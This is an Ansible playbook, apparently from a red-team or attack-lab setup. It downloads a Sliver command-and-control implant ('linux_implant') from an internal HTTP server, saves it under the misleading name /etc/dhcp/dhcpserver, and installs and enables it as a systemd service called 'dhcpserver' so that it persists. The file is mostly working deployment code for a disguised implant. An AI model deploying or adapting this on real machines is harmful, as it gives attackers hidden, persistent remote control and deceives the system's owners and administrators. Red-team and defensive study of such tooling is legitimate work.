---
- name: Create DHCP folder
  ansible.builtin.file:
    state: directory
    path: /etc/dhcp
    owner: root
    group: root
    mode: 0755

- name: Download sliver
  ansible.builtin.get_url:
    url: http://172.16.0.9:8000/linux_implant
    dest: /etc/dhcp/dhcpserver
    mode: 0755

- name: Create service file
  ansible.builtin.copy:
    src: linux_sliver.service
    dest: /etc/systemd/system/dhcpserver.service
    mode: 0644

- name: Start service
  ansible.builtin.systemd:
    name: dhcpserver
    state: started
    enabled: true
